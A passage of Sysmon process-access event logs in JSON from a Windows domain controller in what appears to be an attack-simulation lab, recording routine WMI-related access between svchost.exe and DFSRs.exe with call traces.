C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmidcprv.dll+163a4|C:\\Windows\\system32\\wbem\\wmidcprv.dll+166e0|C:\\Windows\\system32\\wbem\\wmidcprv.dll+abad|C:\\Windows\\system32\\wbem\\wmidcprv.dll+b57e|C:\\Windows\\system32\\DFSRs.exe+d839d|C:\\Windows\\system32\\DFSRs.exe+c0dd|C:\\Windows\\system32\\DFSRs.exe+50e1|C:\\Windows\\system32\\DFSRs.exe+72d2|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.375","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","SourceProcessId":"2804","SourceThreadId":"3124","SourceImage":"C:\\Windows\\system32\\DFSRs.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmidcprv.dll+163a4|C:\\Windows\\system32\\wbem\\wmidcprv.dll+166e0|C:\\Windows\\system32\\wbem\\wmidcprv.dll+abad|C:\\Windows\\system32\\wbem\\wmidcprv.dll+b57e|C:\\Windows\\system32\\DFSRs.exe+d839d|C:\\Windows\\system32\\DFSRs.exe+c0dd|C:\\Windows\\system32\\DFSRs.exe+50e1|C:\\Windows\\system32\\DFSRs.exe+72d2|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1785,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.375\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2204\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+5a1b8|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+35a49|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2807f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29591|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292c2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.375","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2204","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+5a1b8|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+35a49|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2807f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29591|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292c2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1786,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.375\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2204\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.375","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2204","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1787,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.375\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2204\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.375","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2204","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1788,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.375\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2204\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25d35|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2619d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.375","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2204","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25d35|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2619d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1789,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.375\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2204\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+261b7|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.375","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2204","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+261b7|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1790,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.375\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nSourceProcessId: 2804\r\nSourceThreadId: 3124\r\nSourceImage: C:\\Windows\\system32\\DFSRs.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmidcprv.dll+163a4|C:\\Windows\\system32\\wbem\\wmidcprv.dll+166e0|C:\\Windows\\system32\\wbem\\wmidcprv.dll+abad|C:\\Windows\\system32\\wbem\\wmidcprv.dll+b57e|C:\\Windows\\system32\\DFSRs.exe+d839d|C:\\Windows\\system32\\DFSRs.exe+c2ea|C:\\Windows\\system32\\DFSRs.exe+50e1|C:\\Windows\\system32\\DFSRs.exe+72d2|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.375","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","SourceProcessId":"2804","SourceThreadId":"3124","SourceImage":"C:\\Windows\\system32\\DFSRs.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmidcprv.dll+163a4|C:\\Windows\\system32\\wbem\\wmidcprv.dll+166e0|C:\\Windows\\system32\\wbem\\wmidcprv.dll+abad|C:\\Windows\\system32\\wbem\\wmidcprv.dll+b57e|C:\\Windows\\system32\\DFSRs.exe+d839d|C:\\Windows\\system32\\DFSRs.exe+c2ea|C:\\Windows\\system32\\DFSRs.exe+50e1|C:\\Windows\\system32\\DFSRs.exe+72d2|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1791,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.375\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2204\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+264a1|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2669f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25c4b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27476|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27db2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+277c9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26100|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 